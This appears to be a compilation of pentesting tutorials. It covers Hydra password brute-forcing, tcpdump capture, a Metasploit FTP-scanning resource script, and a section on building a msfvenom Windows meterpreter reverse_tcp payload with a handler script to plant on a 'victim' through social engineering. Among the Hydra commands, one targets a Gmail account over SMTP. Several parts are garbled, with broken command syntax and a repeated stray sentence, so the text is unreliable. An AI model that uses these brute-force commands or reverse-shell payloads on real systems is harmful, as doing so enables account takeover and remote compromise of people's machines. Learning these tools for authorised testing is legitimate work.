Hydra

Hydra is a password cracking tool that is supported only on Linux systems. The tool comes as a pre-installed feature on Kali Linux and Parrot versions. The installation process is very simple it only requires the utilization of a command to get the installation. In case that hydra doesn’t show up as a pre-installed gadget is necessary to use the following command which assures the installation of hydra in our machine:

Installing Hydra:

The installation process of Hydra is quite simple, it can be performed with the following command, that will install all the necessary packets that will be required to use hydra.

apt-get install hydra

Hydra Options:

The syntax handled by the tool is simple it calls the name of the tool followed by options, host and the service where it’s going to be directed as is shown in the example below:

hydra (options) host (service)

The main functions of hydra  are mostly focused on the utilization of two flags:

  • – l: Which can be used for the representation of the users selected to look for
  • -P: Which represents the password list that is going to be used as a dictionary to perform the attack

These two flags call a specific file that is going to be used as a guide to direct the attacks, an example of the syntax can be seen on the sentence shown below:

hydra -l user1 -P wordlist.txt smb 

The declaration of the service can be avoided from the syntax but it may help the cracking process if we require the information seeking process on a specific file. It may also be useful to be specific on the folders that contain the file that we want to crack so it will ease the process.

Creating your own wordlist:

The generation of wordlist to serve as a dictionary for the attack can be accomplished using a program called crunch, which generates several combinations of letters and numbers depending on the options you use for its configuration. This process is essential for the attacking process because it will serve as the key to the attack, testing different wordlist will improve the capacity of the brute-force attack.

Crunch installation process:

The process of installation for crunch can be performed by typing the following command:

sudo apt-get install crunch

After the process is finished we can use crunch to generate our text file or insert the character into another program, an example of this can be visualized on the picture shown below:

After the process is finished we can look for the file into the folder we have selected:

Testing Hydra:

Now we have explained the different characteristics involving hydra, we are going to show a few examples of attacks over servers using hydra, The first is an attack over an FTP server, once we have created the wordlist and we possess the IP address assigned to the server. The attack can look like this:

As can be seen on the picture above, we managed to get the password for one of the users configured on the FTP server.  On the example below, we repeat the process over an SMB service with the same results.

hydra -l user1 -P wordlist.txt smb://45.76.60.202 

Other methodologies:

The next step is directed to the possibility to crack the password of an email account. Usually, the email services are referred to an SMPT service. The SMPT services are where the email services are handled. Using hydra we can specify the port where this service handles the email as is showed using hydra to direct the attack to the port 565 of smtp.gmail.com.server which will serve as an example for the following command:

hydra -l jdoe@gmail.com -P /root/Desktop/wordlist.txt -S 565 smtp.gmail.com smtp 

The last Hydra flag that is going to be presented is the (-x) flag. At times, a user can possess a ridiculously long and complicated password that direct attacks cannot crack, however, there’s one method that all passwords fall victim to, brute-force attacks. In a brute-force attack, every combination is used to determine the password. The CPU processor determines the speed, but in the long run, the password will be cracked. Here’s how the brute force option is invoked in hydra:

hydra -l John Doe -x Shortest length: longest length: combinations host

All, but the latter are executable by use of a software called THC-Hydra (Hydra).

Final Considerations:

Passwords are indeed the most commonly used mode of authentication. Of course, the attacks could be directed to exploit the system itself but as personal experience, it is much easier to hack a specific account that is password protected or is located on a server.

This can compromise the whole system itself. There is a wide range of methods that can be applied to crack passwords.  Another tool that can be used to fulfill this purpose is John the ripper which resembles the scope of Hydra but focused on the test the integrity of passwords. However, the ones discussed previously include Bruteforce, Dictionary, and direct attacks on the people (Phishing, Social Engineering and users lack of knowledge). All, but the latter are executable by use of a software called THC-Hydra (Hydra). Hydra can be merged with a tool called Nessus which is used for vulnerability scanning and often calls Hydra to complete the process. Below is an example video of hydra used to perform different attacks:

 

TCPDump – Traffic Capture & Analysis

Description of the tool:

TCPdump is a command line tool which can be used to print out a description and the content of the packets that can be found within a network and traffic that is managed by a network interface that matches a boolean expression. The tool can be also run with different flags that can change the main performance of the tool.

Without previous configuration, TCPdump will run with the -c flag as default and will capture all the packets until is interrupted by a stopping signal.

Installation:

The tool can be installed from the terminal applying the following command:

apt-get install tcpdump

Using TCPdump:

As the tool is installed we can use the different command to capture the traffic that goes through an interface, first, we can use the following command to visualize the different flags available for the tool:

Now we can use the tool to select an interface and see the traffic that is going through that specific  using the following the command we can explore the packets that come into that specific interface but first, we must know the name of the interface, in order to do that we apply the following command to know the name of our interface:

Now we know the name of our interface we can use TCPdump to capture the different packets that are handled by that interface, we can achieve this by using the following command:

sudo tcpdump -i enp0s3

as it can be seen in the picture above the traffic coming for that interface can be visualized using the -i flag along with tcpdump, we can also select the source of the packets applying the following command:

sudo tcpdump -i enp0s3 src 192.168.0.117

Note: The IP address serves as a local demonstration but you can select any IP connected in your network.

We can lock and specify the type of traffic that we want to analyze as it can be seen in the picture above.

We can also use tcpdump to capture the packets for one entire segment of the network selecting destination IP addresses and other sources to capture the packets, these methods can be used by typing the following command:

sudo tcpdump -i enp0s3 -v dst 192.168.0.107 and src 192.168.0.1

Note: This command example is performed within local parameters so the IP addresses may change: 

Conclusion:

TCPdump represents one helpful tool to capture traffic for over specific interfaces, it can be used along with Wireshark to explore the different packets that are sent within the network.

Creating a simple resource script to be used with Metasploit.

As penetration testers or if you just performing a simple or regular scan, we all know that the tasks can become a repetitive process (e. g. if you are performing a pentest in a streamlined environment). Typing, again and again, the Metasploit commands and making minor changes to perform an attack in the target can get a bit tiresome, but not to worry, here is where resource scripts can be very useful and be used on Metasploit to automate the repetitive tasks at hand.

They are essentially batch scripts and contain a set of commands that are automatically and sequentially executed when you load this resource scripts in Metasploit. A resource script can be created by chaining together a series of console Metasploit commands, mainly used for scanning purposes, and you can even directly embed Ruby to do things like call APIs, interact with objects in the database, and iterate actions.

We are going to create a simple resource script as an example, that will automate, the auxiliary scanning in an ftp service and will inform us what version of ftp service, the target is currently running.

The commands are basically the same that you are accustomed to using in Metasploit with the adding of the automation process.

You can create the script in any text editor you feel comfortable with.

We’ll create the script by typing Metasploit commands (the commands are the same regarding structure) but the commands will be executed unsequentially.

The first command we’ll use is the following:

msfconsole
use auxiliary/scanner/ftp/ftp_version

This will execute the scanning process and will tell us what ftp version is running in the target, as we have said before.

The next command will be to “see” what options you want to execute in the Pentest using the script you’ll be creating.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary (scanner/ftp/ftp_version) options

As a result, you will see the options available for the ftp service. For this example, the most important aspects are the RHOST, the threads in it, and to select the appropriate range of machines (target).

So for the script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4 [target host]
set THREADS 10 [number of threads]

The threads are dependant on the scale of the network, so, if you are scanning a large networks, you have to increase the amount of threads you want to use.

Now there’s something to be considered about this. and is the fact that you can change this values “on the fly”, therefore, you don’t have to type into the metasploit console the commands again and again if you want to change the options you want to explore, you can change it in the script and they can be executed remotely.

And now we just execute the command, or if you you are using an exploit module; exploit, but as this is a simple resource script we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.103
set THREADS 10
run

We save this text file as  

vim ftp_scanner.rc

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run

esc
:
w


Where the extension .rc means resource script. Now we locate the script to be run in Metasploit. In there you type:

cd (location of the script you just created)

You have to make sure that your Metasploit post-rescue database is built and is already running. So now we can perform the Pentest of the ftp service by running this script, to look for threads in the RHOST of the target host

In Metasploit we type

msfconsole -r ftp_scanner.rc


This will start the Metasploit Framework and launch the created resource script.

Advantages of the Resource Scripts

And now the interesting this about this procedure is that after performing the scanning and getting the results assorted and ready for you to assess the information you just obtained if you want to change the IP or increase the threads you just have to edit the script and run it again.

Resource scripts versatility lies in their ability to take advantage of many of the capabilities that are available in Metasploit and Ruby, whether you are using them from the Metasploit console or from the Metasploit web interface.

The community of The Metasploit Framework has made available many resource scripts, so if you are a framework user, you can go to.

Here at Infosec Addicts in our courses Pentesting Candidate program and Ultimate Hacklab, you can get more information about the creation of this useful tools to facilitate the performing of any audit procedures or Pentest, using Metasploit. We hope sincerely that you can join us in this quest, of finding the best and more reliable solutions to be able to perform a Pentest in a throughout and reliable way for you.

 

 

Data-mining a compromised host

In this blog, we are going to take a file that can be .txt .doc .exe and we inject a payload to it, later we will verify which antivirus it detects, and finally, we will be able this file in the victim, and we will observe what happens.

what is a payload?

We can say that a payload is something harmful that is activated when executing any malware, in addition to raising privileges, it takes full advantage of the vulnerabilities found, in essence, the Payload is the part of the malicious code within the exploit, in charge of exploiting and exploiting this vulnerability to the maximum.

Installing tools in ubuntu and Debian

It does not emphasize the installation of Metasploit, but we will do a little review, so you know what it is about.

We open a Linux terminal and copies and paste the following command:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

The result of the command will be the following:

In case you have some error with the installation in this link https://www.metasploit.com/ you find the necessary documentation to perform the installation

To create a payload we have a lot of tools, a significant one is Metasploit; we will generate a payload to attack Windows 7.

msfvenom -a x86 –platform windows -p windows / meterpreter / reverse_tcp LHOST = 192.168.100.3 -b “\ x00” -f exe -o Meterpreter.exe

This is the file that we have created and that we will put on the victim machine.

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc

msfconsole -r meterpreter.rc

To put the payload on the victim’s machine, you can use social engineering or any other way. In this case, we will upload it with a meterpreter session to make it faster.

The following image shows the file on the Windows 7 machine.

This would be the result of the attack

Checking the victim’s network settings

This is another command with which we can do tests, this serves to show a list of files and directories.

A session of meterpreter as a shell of windows you have a large amount of commands that are very useful at the time of making an attack.